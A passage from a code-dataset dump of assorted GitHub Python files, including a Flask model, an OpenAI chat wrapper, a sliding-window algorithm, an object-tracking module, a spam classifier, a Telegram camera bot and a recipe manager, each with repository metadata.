print(modeltrainer.initialise_training(new_train_data,new_test_data,new_y_train,new_y_test))\r\n\r\n\r\n","repo_name":"YashAPro1/ML-CICD-Pipeline","sub_path":"src/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6623525131","text":"import datetime\n\n# import classes\nfrom app.models.base_model import BaseModel\nfrom app.models import db\n\n\nclass Booth(db.Model, BaseModel):\n\t# table name\n\t__tablename__ = 'booths'\n\t# displayed fields\n\tvisible = ['id', 'user_id', 'stage_id', 'points', 'summary', 'type', 'logo_url', 'url', 'name', 'created_at', 'updated_at']\n\n\t# columns definitions\n\tid = db.Column(db.Integer, primary_key=True)\n\tuser_id = db.Column(\n\t\tdb.String(40),\n\t\tdb.ForeignKey('users.id'),\n\t\tnullable=True\n\t)\n\tuser = db.relationship('User')\n\tstage_id = db.Column(\n\t\tdb.String(40),\n\t\tdb.ForeignKey('stages.id')\n\t)\n\tstage = db.relationship('Stage')\n\tsummary = db.Column(db.Text)\n\ttype = db.Column(db.String)\n\tpoints = db.Column(db.Integer)\n\tname = db.Column(db.String(255))\n\turl = db.Column(db.String(255))\n\tlogo_url = db.Column(db.String(255))\n\tcreated_at = db.Column(db.DateTime)\n\tupdated_at = db.Column(db.DateTime)\n\n\tdef __init__(self):\n\t\tself.created_at = datetime.datetime.now()\n\t\tself.updated_at = datetime.datetime.now()\n\t\tself.summary = ''\n\t\tself.points = 0\n","repo_name":"devsummit/backend","sub_path":"app/models/booth.py","file_name":"booth.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"6576364145","text":"'''Have a conversation with Aria, powered by OpenAI chat completion'''\n\nimport json\nimport openai\n\nclass Conversation:\n '''Object-class containing the ongoing conversation'''\n\n def __init__(self):\n '''Constructs the conversation with the necessary settings'''\n self.reset()\n with open('./data/keys.json', encoding='UTF-8') as keys:\n openai.api_key = json.load(keys)['OPEN_AI_KEY']\n\n def get_response(self, prompt: str):\n '''Sends a message to the assistant and gets the response'''\n try:\n self.messages.append({'role': 'user', 'content': prompt})\n completion = openai.ChatCompletion.create(\n model=self.model,\n messages=self.messages,\n max_tokens=self.max_tokens\n )\n self.messages.append(completion.choices[0]['message'])\n return completion.choices[0]['message']['content']\n except Exception:\n return \"I'm sorry, I don't understand.\"\n\n def reset(self):\n '''Clears all messages and sets settings back to default'''\n with open('./data/conversationSettings.json', encoding='UTF-8') as settings:\n data = json.load(settings)\n self.messages = data['settings']\n self.model = data['model']\n self.temperature = data['temperature']\n self.max_tokens = data['max_tokens']\n\nif __name__ == '__main__':\n chat = Conversation()\n print(chat.get_response(\"Whats your name\"))\n","repo_name":"AJWestley/Aria","sub_path":"Skills/conversation.py","file_name":"conversation.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71970626249","text":"\"\"\"\nYou are given an array of integers nums, there is a sliding window of size k which is moving from the very left of the array to the very right.\nYou can only see the k numbers in the window. Each time the sliding window moves right by one position.\n\nReturn the max sliding window.\nnums = [1,3,-1,4,5], k = 3\n\n[3,1,-1,4,5] => [3,4,-1,4,5]\n\n[0]=0\n[1]=1\n[2]=2\n\nidx=0 => 1\nleft=1 => 3\n\nidx=0 => 3\nleft=1 => 1\n\nha[0]=1\nha[1]=0\nha[3]=1\n\n\n\n\n\"\"\"\nimport math\nfrom typing import List\n\nimport test2\n\n\nclass Solution:\n\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n if k == 1:\n return nums\n if k == len(nums):\n return [max(nums)]\n\n handleByOrgId = {}\n handleByCurId = {}\n\n def heapDown(idx):\n left = 2 * idx + 1\n right = 2 * idx + 2\n maxIdx = idx\n\n if not (left >= k and right >= k):\n if left < k and nums[maxIdx] < nums[left]:\n maxIdx = left\n if right < k and nums[maxIdx] < nums[right]:\n maxIdx = right\n if maxIdx != idx:\n temp = nums[idx]\n nums[idx] = nums[maxIdx]\n nums[maxIdx] = temp\n\n orgIdForIdx = handleByCurId[idx]\n handleByOrgId[orgIdForIdx] = maxIdx\n\n orgIdForMaxId = handleByCurId[maxIdx]\n handleByOrgId[orgIdForMaxId] = idx\n\n handleByCurId[idx] = orgIdForMaxId\n handleByCurId[maxIdx] = orgIdForIdx\n\n heapDown(maxIdx)\n\n def heapUp(idx):\n while ((idx - 1) / 2) >= 1 and idx > 1:\n parent = math.floor((idx - 1) / 2)\n if nums[parent] < nums[idx]:\n temp = nums[idx]\n nums[idx] = nums[parent]\n nums[parent] = temp\n\n orgIdForIdx = handleByCurId[idx]\n handleByOrgId[orgIdForIdx] = parent\n\n orgIdForParent = handleByCurId[parent]\n handleByOrgId[orgIdForParent] = idx\n\n handleByCurId[idx] = orgIdForParent\n handleByCurId[parent] = orgIdForIdx\n idx = parent\n else:\n break\n\n def heapUpOrDown(idx):\n parent = math.floor((idx - 1) / 2)\n if parent >= 1 and nums[parent] < nums[idx]:\n heapUp(idx)\n else:\n heapDown(idx)\n\n def heapify():\n j = k\n while j > 0:\n heapDown(j)\n j -= 1\n\n firstMaxVal = 0\n i = 0\n while i < k:\n if i != 0:\n handleByOrgId[i] = i\n handleByCurId[i] = i\n firstMaxVal = max(firstMaxVal, nums[i])\n i += 1\n\n returnList = [firstMaxVal]\n handleByOrgId[k] = k\n handleByCurId[k] = k\n heapify()\n\n p = k + 1\n q = 1\n while p < len(nums):\n returnList.append(nums[1])\n updateIdx = handleByOrgId[q]\n\n q = q + 1\n nums[updateIdx] = nums[p]\n handleByOrgId[p] = updateIdx\n handleByCurId[updateIdx] = p\n heapUpOrDown(updateIdx)\n p = p + 1\n\n returnList.append(nums[1])\n return returnList\n\n\nnums = [1,3,-1,-3,5,3,6,7]\nk =3\nsl = Solution()\nprint(sl.maxSlidingWindow(nums, k))\n","repo_name":"shashiram/Data-Structures-and-Algorithms","sub_path":"MaxSlidingWindow.py","file_name":"MaxSlidingWindow.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42332301545","text":"import json\nfrom pathlib import Path\n\nfrom OTVision.config import CONFIG\nfrom OTVision.helpers.files import denormalize, get_files\nfrom OTVision.helpers.log import log\n\nfrom .iou import track_iou\nimport torch\nimport os\n\nfrom OTVision.siam import NeuralNetwork\nfrom OTVision.track.cluster_track import dbscan\n\n\ndef main(\n paths,\n yolo_mode=\"spp\", # Why yolo mode?\n sigma_l=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_L\"],\n sigma_h=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_H\"],\n sigma_iou=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_IOU\"],\n t_min=CONFIG[\"TRACK\"][\"IOU\"][\"T_MIN\"],\n t_miss_max=CONFIG[\"TRACK\"][\"IOU\"][\"T_MISS_MAX\"],\n overwrite=CONFIG[\"TRACK\"][\"OVERWRITE\"],\n debug: bool = CONFIG[\"TRACK\"][\"DEBUG\"],\n clustering=CONFIG[\"TRACK\"][\"CLUSTERING\"],\n):\n log.info(\"Start tracking\")\n if debug:\n log.setLevel(\"DEBUG\")\n log.debug(\"Debug mode on\")\n\n filetype = CONFIG[\"DEFAULT_FILETYPE\"][\"DETECT\"]\n detections_files = get_files(paths, filetype)\n\n # kav 200922\n model_siam = NeuralNetwork()\n model_siam.eval()\n if torch.cuda.is_available():\n model_siam.load_state_dict(torch.load('checkpoints/big.pth', map_location=torch.device('cuda:0')))\n model_siam = model_siam.cuda()\n else:\n model_siam.load_state_dict(torch.load('checkpoints/big.pth', map_location=torch.device('cpu')))\n model_siam = model_siam.cpu()\n\n\n\n for detections_file in detections_files:\n log.info(f\"Try tracking {detections_file}\")\n\n try:\n with open(detections_file) as f:\n detections = json.load(f)\n log.info(f\"{filetype} read\")\n\n detections_denormalized = denormalize(detections)\n log.info(\"Detections denormalized\")\n\n dir = os.path.dirname(detections_file)\n file_name = os.path.basename(detections_file).split('.')[0]\n dir_features = os.path.join(dir, file_name + '_features')\n\n tracks_px, trajectories_geojson = track(\n detections=detections_denormalized,\n yolo_mode=yolo_mode,\n sigma_l=sigma_l,\n sigma_h=sigma_h,\n sigma_iou=sigma_iou,\n t_min=t_min,\n t_miss_max=t_miss_max,\n model_siam=model_siam, # kav 200922\n dir_features=dir_features,\n )\n\n log.info(\"Detections tracked\")\n if clustering:\n tracks_px = dbscan(tracks_px)\n # print(bad_id)\n\n write(\n tracks_px=tracks_px,\n detections_file=detections_file,\n overwrite=overwrite,\n )\n except OSError as oe:\n log.error(\n (\n f'Could not open \"{detections_file}\". '\n f\"Following exception occured: {str(oe)}\"\n )\n )\n except json.JSONDecodeError as je:\n log.error(\n (\n f'Unable to decode \"{detections_file}\" as JSON.'\n f\"Following exception occured: {str(je)}\"\n )\n )\n\n\ndef track(\n detections,\n yolo_mode=\"spp\",\n sigma_l=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_L\"],\n sigma_h=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_H\"],\n sigma_iou=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_IOU\"],\n t_min=CONFIG[\"TRACK\"][\"IOU\"][\"T_MIN\"],\n t_miss_max=CONFIG[\"TRACK\"][\"IOU\"][\"T_MISS_MAX\"],\n model_siam=None, # kav 200922\n dir_features='',\n):\n new_detections, trajectories_geojson, vehIDs_finished = track_iou(\n detections=detections[\"data\"],\n sigma_l=sigma_l,\n sigma_h=sigma_h,\n sigma_iou=sigma_iou,\n t_min=t_min,\n t_miss_max=t_miss_max,\n model_siam=model_siam, # kav 200922\n w_frame=detections['vid_config']['width'],\n h_frame=detections['vid_config']['height'],\n dir_features=dir_features,\n )\n\n trk_config = {\n \"yolo_mode\": yolo_mode,\n \"tracker\": \"IOU\",\n \"sigma_l\": sigma_l,\n \"sigma_h\": sigma_h,\n \"sigma_iou\": sigma_iou,\n \"t_min\": t_min,\n \"t_miss_max\": t_miss_max,\n }\n\n tracks_px = {\n \"vid_config\": detections[\"vid_config\"],\n \"det_config\": detections[\"det_config\"],\n \"trk_config\": trk_config,\n \"data\": new_detections,\n }\n\n return tracks_px, trajectories_geojson\n\n\n# TODO: Implement overwrite as in detect, maybe refactor?\ndef write(\n tracks_px,\n detections_file,\n overwrite=CONFIG[\"TRACK\"][\"OVERWRITE\"],\n):\n # ?: Check overwrite before tracking instead of before writing tracking?\n # TODO: Export also as csv, trj and alternative json\n tracks_file = Path(detections_file).with_suffix(CONFIG[\"DEFAULT_FILETYPE\"][\"TRACK\"])\n tracks_file_already_exists = tracks_file.is_file()\n if overwrite or not tracks_file_already_exists:\n # Write JSON\n with open(tracks_file, \"w\") as f:\n json.dump(tracks_px, f, indent=4)\n if tracks_file_already_exists:\n log.info(f\"{tracks_file} overwritten\")\n else:\n log.info(f\"{tracks_file} file written\")\n else:\n log.info(f\"{tracks_file} already exists. To overwrite, set overwrite=True\")\n","repo_name":"Kommunarus/otv","sub_path":"OTVision/track/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23716253286","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport pymysql\nimport numpy as np\nimport pickle\n\n\"\"\"\nStep1. data load\n\"\"\"\ndef loading_data():\n ## DB connection\n conn = pymysql.connect(host = \"127.0.0.1\", user = [USER], passwd = [PASSWORD], db = [DATABASE], cursorclass = pymysql.cursors.DictCursor)\n cur = conn.cursor()\n \n cur.execute(\"show databases\")\n cur.execute(\"use crawling\")\n\n ## Table data loading\n # news\n query = \"\"\" \n select * from news_counting;\n \"\"\"\n cur.execute(query)\n news_df = pd.DataFrame(list(cur.fetchall())).drop(['id'], axis=1)\n news_df.head()\n\n # portal\n # 카카오변수 제외, 구글/네이버를 활용하기위해 \n # 네이버 변수가 값을 갖는 2016년 1월부터 데이터 사용\n query = \"\"\" \n select * from portal_trends_ratio ;\n \"\"\"\n cur.execute(query)\n portal_df = pd.DataFrame(list(cur.fetchall()))\n portal_df = portal_df[['year', 'month', 'day', 'google', 'naver']][17:]\n\n ## response y: CCSI(소비자심리지수)\n query = \"\"\" \n select * from ccsi ;\n \"\"\"\n cur.execute(query)\n conn.close()\n cur.close()\n # X와 기간을 맞춤\n ccsi = pd.DataFrame(list(cur.fetchall()))[4:].reset_index(drop = True)\n\n return news_df, portal_df, ccsi\n\n\n\n\"\"\"\nStep2. X, y dataframe\n\"\"\"\n\n# 달의 마지막주인지 확인하는 function\ndef isLastWeekOfThisMonth(X, index):\n if(index == (len(X) - 1)):\n return True\n if ( X.iloc[index].month != X.iloc[index + 1].month ):\n return True\n return False\n\n# 달의 마지막 주차이면, 해당 달의 데이터들의 평균값들을 하나의 record로 갖는 dataframe 생성\ndef getYdataframe(X, y):\n count = 0\n y_weekly = pd.DataFrame()\n\n for i in range(len(X)):\n count+= 1\n\n if ( isLastWeekOfThisMonth(X, i) ):\n a = np.where((y.month == X.iloc[i].month) & (y.year == X.iloc[i].year ))[0]\n present_ccsi = float(y.iloc[a].ccsi)\n \n past_ccsi = float(y.iloc[a-1].ccsi)\n sub = present_ccsi - past_ccsi\n \n for index in range(count):\n n = ((index+1) / count)*(sub)+past_ccsi\n record = pd.Series([int(X.iloc[i].year), int(X.iloc[i].month), int(X.iloc[i-(count-index)+1].day), n])\n row_df = pd.DataFrame([record])\n y_weekly = pd.concat([y_weekly, row_df], ignore_index=True)\n \n \n count = 0\n \n return y_weekly\n\n# df column명 정해주는 function\ndef renameXdataframe(X):\n X.rename(columns={0: 'year', 1: 'month',2:'day', 3: 'keyword1', 4: 'keyword2', 5: 'keyword3', 6: 'keyword4', 7: 'keyword5', 8: 'google', 9: 'naver'}, inplace = True)\n return X.astype({\"year\": int, \"month\": int, \"day\": int})\n\n\ndef renameYdataframe(y):\n y.rename(columns={0: 'year', 1: 'month',2:'day', 3: 'ccsi'}, inplace = True)\n return y.astype({\"year\": int, \"month\": int, \"day\": int})\n\n\ndef getX_y_dateframe():\n news_df, portal_df, ccsi = loading_data()\n predictors = pd.merge(news_df, portal_df)\n\n y_df = getYdataframe(predictors, ccsi)\n y_df = renameYdataframe(y_df)\n X_df = renameXdataframe(predictors)\n \n return X_df, predictors, y_df\n\n\"\"\"\nStep3. Modeling\n- split train and test set\n\"\"\"\ndef getTrainTestSet(X_df, ccsi):\n df = pd.merge(X_df, ccsi)\n X = df[['keyword1', 'keyword2', 'keyword3', 'keyword4', 'keyword5', 'google', 'naver']] # X: 예측변수 dataframe\n y = df[['ccsi']] # y: 반응변수 dataframe\n\n # CV를 활용하기 위해, validate set은 따로 분할하지 않는다.\n X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.8, test_size=0.2, shuffle=False)\n\n return X_train, X_test, y_train, y_test\n \n\n###################### main ######################\nif __name__ == \"__main__\":\n X_df, predictors, ccsi = getX_y_dateframe()\n X_train, X_test, y_train, y_test = getTrainTestSet(X_df, ccsi) \n pickle.dump(X_train, open('./dataset/dataset_interpolation/X_train.pkl','wb'))\n pickle.dump(X_test, open('./dataset/dataset_interpolation/X_test.pkl','wb'))\n pickle.dump(y_train, open('./dataset/dataset_interpolation/y_train.pkl','wb'))\n pickle.dump(y_test, open('./dataset/dataset_interpolation/y_test.pkl','wb'))\n pickle.dump(ccsi, open('./dataset/dataset_interpolation/ccsi.pkl','wb'))\n pickle.dump(predictors, open('./dataset/dataset_interpolation/predictors.pkl','wb'))\n","repo_name":"2hyes/CLI-development","sub_path":"getTrainTestSet/getTrainTestSet_interpolation.py","file_name":"getTrainTestSet_interpolation.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"35494544623","text":"import logging.config\n\nimport click\n\nfrom .version import VERSION\nfrom .worker import RunWorkerProcess, import_string\n\nburst_help = 'Batch mode: exit once no jobs are found in any queue.'\nhealth_check_help = 'Health Check: run a health check and exit'\nverbose_help = 'Enable verbose output.'\n\n\n@click.command()\n@click.version_option(VERSION, '-V', '--version', prog_name='arq')\n@click.argument('worker-path', type=click.Path(exists=True, dir_okay=False, file_okay=True), required=True)\n@click.argument('worker-class', default='Worker')\n@click.option('--burst/--no-burst', default=False, help=burst_help)\n@click.option('--check', is_flag=True, help=health_check_help)\n@click.option('-v', '--verbose', is_flag=True, help=verbose_help)\ndef cli(*, worker_path, worker_class, burst, check, verbose):\n \"\"\"\n Job queues in python with asyncio, redis and msgpack.\n\n CLI to run the arq worker.\n \"\"\"\n worker = import_string(worker_path, worker_class)\n logging.config.dictConfig(worker.logging_config(verbose))\n\n if check:\n exit(worker.check_health())\n else:\n RunWorkerProcess(worker_path, worker_class, burst)\n","repo_name":"justlittle/arq","sub_path":"arq/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"54255874396","text":"# import sys\n# sys.path.append('.')\nimport pandas as pd\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import svm\nimport psycopg2\ndef spam(review):\n df1 = pd.read_csv(\"machine/Sigma-Channel1.csv\")\n df2 = pd.read_csv(\"machine/Sigma-Channel2.csv\")\n df3 = pd.read_csv(\"machine/Sigma-Channel3.csv\")\n df4 = pd.read_csv(\"machine/Sigma-Channel4.csv\")\n df5 = pd.read_csv(\"machine/Sigma-Channel5.csv\")\n\n frames = [df1, df2, df3, df4, df5]\n # create a single data frame\n df_merged = pd.concat(frames)\n\n # assigning keys to allow model know the respective database\n keys = [\"Channel1\",\"Channel2\",\"Channel3\",\"Channel4\",\"Channel5\"]\n df_with_keys = pd.concat(frames,keys=keys)\n\n df = df_with_keys\n # extracting columns from database\n df_data = df[[\"CONTENT\",\"CLASS\"]]\n\n df_x = df_data['CONTENT']\n df_y = df_data['CLASS']\n\n corpus = df_x\n # raw texts are converted to vector numeric values. Preparing to fit in\n # machine learning model\n cv = CountVectorizer()\n X = cv.fit_transform(corpus)\n # Algorithm will use 70% of data for training model, 30% will be used for model testing.\n X_train, X_test, y_train, y_test = train_test_split(X, df_y, test_size=0.30, random_state=42)\n # Naive Bayes algorithm to train the spam model\n clf = MultinomialNB()\n # fitting model into dataset to identify pattterns and insights of the dataset\n clf.fit(X_train,y_train)\n\n comment = [\"{}\".format(review)]\n test_score = clf.score(X_train, y_train) * 100\n print(f\"Accuracy = {test_score:.2f}%\")\n # converting result into array\n vect = cv.transform(comment).toarray()\n result = clf.predict(vect)\n\n if (result[0] == 1):\n return True\n\n return False\n","repo_name":"AiXueK/Movie-Search-Web","sub_path":"project/backend/machine/spam.py","file_name":"spam.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2904987683","text":"from board import Board\nfrom human_control import HumanControl\n\n\ndef test_board_check():\n # initialize 5 * 5 board to test\n board1 = Board(5, 5, 100)\n hc1 = HumanControl(board1)\n # set some tiles on board1\n board1.table = [[0, 'white', 0, 0, 'black'],\n [0, 'white', 0, 'white', 0],\n [0, 'white', 'white', 0, 0],\n [0, 0, 'white', 'black', 0],\n [0, 0, 0, 0, 0]]\n hc1.board_check()\n # check the valid positions\n valid1 = (0, 0)\n valid2 = (1, 3)\n assert valid1 in hc1.vaild_positions\n assert valid2 in hc1.vaild_positions\n\n\ndef test_line_check():\n # still use board1 to check\n board1 = Board(5, 5, 100)\n hc1 = HumanControl(board1)\n # set some tiles on board1\n board1.table = [[0, 'white', 0, 0, 'black'],\n [0, 'white', 0, 'white', 0],\n [0, 'white', 'white', 0, 0],\n [0, 0, 'white', 'black', 0],\n [0, 0, 0, 0, 0]]\n # pick a valid cell to test\n col = 1\n row = 3\n # check the valid line: upper right\n xadd = 1\n yadd = -1\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(col, row)]\n # check an invaild line: up\n xadd = 0\n yadd = -1\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(col, row)]\n # pick an invalid cell to test\n col = 3\n row = 2\n for xadd in hc1.ADD:\n for yadd in hc1.ADD:\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(1, 3)]\n","repo_name":"LinzheHE/Othello_Game","sub_path":"human_control_test.py","file_name":"human_control_test.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73541241928","text":"class LoadTraceInstruction(object):\n \"\"\"Track load trace instruction in an orderly manner.\"\"\"\n def __init__(self, line):\n tokens = line.split(', ')\n self.uiid = int(tokens[0])\n self.cycle = int(tokens[1])\n self.addr = int(tokens[2], 16)\n self.pc = int(tokens[3], 16)\n self.is_hit = bool(tokens[4])\n\n # List of (pc, dec) tuples, from most recent to least recent.\n #print(tokens[5:])\n self.branches = [(int(tokens[i], 16), bool(int(tokens[i + 1]))) for i in range(5, len(tokens), 2)]\n\n def __str__(self):\n s = f'uiid={self.uiid} cycle={self.cycle} pc={hex(self.pc)} addr={hex(self.addr)} is_hit={self.is_hit} branches=['\n for pc, dec in self.branches:\n if pc == 0 and not dec:\n continue\n s += f'(pc={hex(pc)} dec={\"T\" if dec else \"NT\"})'\n s += ']'\n return s\n\n\ndef get_instructions(f):\n \"\"\"Process the load trace as a generator, (note the yield)\n yielding every loaded data address.\n Can call using gather_correlation_data inside an\n open (or variant) context.\"\"\"\n for line in f:\n # For handling some invalid lines in the ML-DPC load traces\n if line.startswith('***') or line.startswith('Read'):\n continue\n yield LoadTraceInstruction(line)\n","repo_name":"cmolder/voyager-analysis","sub_path":"utils/load_trace.py","file_name":"load_trace.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73101577928","text":"import dataset\r\n\r\nasync def get_data(players: list, table_players: dataset.Table, lobby: dict) -> dict:\r\n data = {}\r\n questions = []\r\n for i in range(len(players)):\r\n player_db = table_players.find_one(user=players[i], game=lobby.get(\"code\"))\r\n questions.append(list(player_db.get(\"data\")))\r\n \r\n questions = [elem[0] for elem in questions]\r\n\r\n for question in questions:\r\n answers = {}\r\n for player in players:\r\n try:\r\n answers[player] = table_players.find_one(user=player).get(\"data\")[question]\r\n except KeyError:...\r\n data[question] = answers\r\n \r\n return data\r\n\r\n","repo_name":"belkinark/NotipBox","sub_path":"utils/text2player.py","file_name":"text2player.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21435582614","text":"# -*- coding: utf-8 -*-\n\nimport telebot\nimport datetime\nimport os\nfrom picamera import PiCamera\nfrom homie import settings\nfrom homie.utils import *\nfrom homie.security import *\nfrom homie.classes import *\n\nbot = telebot.TeleBot(settings.API_TOKEN)\ncamera = PiCamera()\n\n\n@bot.message_handler(commands=['enviarvideo'])\ndef send_video(message):\n \"\"\"\n Captures a new video, saves it and sends it\n \"\"\"\n filename = '{}{}{}'.format(\n settings.OUTPUT_DIRECTORY, \n get_filename_from_time(), \n settings.VIDEO_EXTENSION\n )\n bot.send_message(message.chat.id, 'Grabando vídeo, esto puede llevar unos minutos...')\n camera.start_recording(filename)\n camera.wait_recording(settings.MAX_VIDEO_TIME)\n camera.stop_recording()\n bot.send_message(message.chat.id, 'Vídeo grabado, enviando...')\n bot.send_video(message.chat.id, open(filename, 'rb'))\n\n \n@bot.message_handler(commands=['enviarfoto'])\ndef send_photo(message):\n \"\"\"\n Captures a new image, saves it and sends it\n \"\"\"\n filename ='{}{}{}'.format(\n settings.OUTPUT_DIRECTORY, \n get_filename_from_time(), \n settings.IMAGE_EXTENSION\n )\n bot.send_message(message.chat.id, 'Enviando foto...')\n camera.capture(filename)\n bot.send_photo(message.chat.id, open(filename, 'rb'))\n log = ('Foto ' + filename + ' guardada por ' + message.chat.first_name + ' ' \n + message.chat.last_name + ' [' + str(message.chat.id) + ']')\n print(log)\n\n\n \ndef initialize():\n camera.rotation = settings.ROTATION.value\n camera.resolution = (\n settings.RESOLUTION.value['height'], \n settings.RESOLUTION.value['width']\n )\n\n\nif __name__ == '__main__':\n initialize()\n print('Bot listening!')\n bot.polling()\n","repo_name":"pablo-moreno/homie-legacy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37854425228","text":"from Entidades.receita import Receita\nfrom Telas.tela_receita import TelaReceita\nfrom Telas.tela_receita_acoes import TelaReceitaAcoes\nfrom Telas.tela_receita_view import TelaReceitaView\nfrom Telas.tela_receita_relatorio import TelaReceitaRelatorio\nfrom Entidades.ingrediente_receita import IngredienteReceita\nfrom DAOs.receita_dao import ReceitaDAO\nfrom DAOs.relatorio_dao import RelatorioDAO\nfrom Excecoes.empty_list_exception import EmptyListException\nfrom datetime import date\n\n\nclass ControladorReceita:\n def __init__(self, controlador_sistema):\n self.__controlador_sistema = controlador_sistema\n self.__controlador_ingrediente = self.__controlador_sistema.dao_ingrediente\n self.__dao = ReceitaDAO()\n self.__dao_relatorio = RelatorioDAO()\n self.__tela_receitas = TelaReceita()\n self.__tela_receitas_acoes = TelaReceitaAcoes()\n self.__tela_receita_view = TelaReceitaView()\n self.__tela_receita_relatorio = TelaReceitaRelatorio()\n self.__eventos_receita = []\n\n def abre_tela(self):\n lista_opcoes = {'cadastro': self.cadastrar_receita,\n 'alteracao': self.alterar_receita,\n 'view': self.visualizar_receita,\n 'relatorio': self.ver_relatorio_receita,\n 'exclusao': self.excluir_receita,\n 'retorna': self.retornar_menu_principal}\n\n while True:\n opcao_menu, valor_menu = self.__tela_receitas.abre_tela(self.__dao.get_all_names())\n self.__tela_receitas.fecha_tela()\n if opcao_menu is None:\n exit(0)\n\n if opcao_menu == 'alteracao' or opcao_menu == 'exclusao' or opcao_menu == 'view':\n lista_opcoes[opcao_menu](valor_menu['cb_opcao'])\n else:\n lista_opcoes[opcao_menu]()\n\n def cadastrar_receita(self):\n ingredientes_estoque = self.lista_ingredientes_menu()\n infos_tela = None\n button, dados_receita = self.__tela_receitas_acoes.abre_tela(ingredientes_estoque, infos_tela)\n\n if button == 'cancel':\n self.abre_tela()\n\n if dados_receita is None:\n self.cadastrar_receita()\n\n ingredientes_receita = self.criar_lista_ingredientes(dados_receita[\"ingredientes_receita\"])\n\n nova_receita = Receita(dados_receita[\"titulo\"], ingredientes_receita, dados_receita[\"preparo\"])\n\n if nova_receita in self.__dao.get_all():\n self.__tela_receitas.erro_ja_cadastrado(nova_receita.titulo)\n self.abre_tela()\n self.__dao.add(nova_receita.titulo, nova_receita)\n self.registra_evento(\"Cadastro de receita\", nova_receita.titulo)\n\n def alterar_receita(self, titulo):\n ingredientes_estoque = self.lista_ingredientes_menu()\n receita_alterada = self.__dao.get(titulo)\n\n if receita_alterada is None:\n self.abre_tela()\n\n infos_tela = {'titulo': receita_alterada.titulo,\n 'preparo': receita_alterada.preparo,\n 'ingredientes': receita_alterada.ingredientes_receita}\n\n button, dados_receita = self.__tela_receitas_acoes.abre_tela(ingredientes_estoque, infos_tela)\n\n if button == 'cancel':\n self.abre_tela()\n else:\n if dados_receita is None:\n self.alterar_receita(titulo)\n\n self.__dao.remove(receita_alterada.titulo)\n receita_alterada.titulo = dados_receita[\"titulo\"]\n receita_alterada.ingredientes_receita = self.criar_lista_ingredientes(dados_receita[\"ingredientes_receita\"])\n receita_alterada.preparo = dados_receita[\"preparo\"]\n self.__dao.add(receita_alterada.titulo, receita_alterada)\n\n self.registra_evento(\"Alteração de receita\", receita_alterada.titulo)\n self.abre_tela()\n\n def visualizar_receita(self, titulo):\n receita = self.__dao.get(titulo)\n\n if receita is None:\n self.abre_tela()\n\n ingredientes = ''\n for i in receita.ingredientes_receita:\n ingredientes += str(i.nome) + ' - ' + str(i.quantidade) + ' ' + str(i.unidade_medida) + '\\n'\n titulo = receita.titulo\n preparo = receita.preparo\n\n button_value = self.__tela_receita_view.abre_tela(titulo, ingredientes, preparo)\n self.registra_evento(\"Pesquisa de receita\", receita.titulo)\n if button_value is None:\n exit(0)\n elif button_value == 'retornar':\n self.abre_tela()\n else:\n self.fazer_receita(titulo)\n\n def fazer_receita(self, titulo):\n receita = self.__dao.get(titulo)\n\n for i in receita.ingredientes_receita:\n ingrediente_estoque = self.__controlador_ingrediente.get(i.nome)\n if ingrediente_estoque.quantidade < i.quantidade:\n self.__tela_receita_view.erro_ingredientes_insuficientes(i.nome)\n self.abre_tela()\n\n for i in receita.ingredientes_receita:\n ingrediente_deduzir = self.__controlador_ingrediente.get(i.nome)\n ingrediente_deduzir.quantidade -= i.quantidade\n self.__controlador_ingrediente.add(ingrediente_deduzir.nome, ingrediente_deduzir)\n self.__tela_receitas.feedback_sucesso()\n\n self.registra_evento(\"Receita feita\", titulo)\n\n def ver_relatorio_receita(self):\n try:\n if not self.__dao_relatorio.get():\n raise EmptyListException()\n\n relatorio = ''\n for i in self.__dao_relatorio.get():\n relatorio += i + '\\n'\n self.__tela_receita_relatorio.abre_tela(relatorio)\n\n except EmptyListException:\n self.abre_tela()\n\n def excluir_receita(self, titulo):\n valor = self.__dao.remove(titulo)\n if valor == 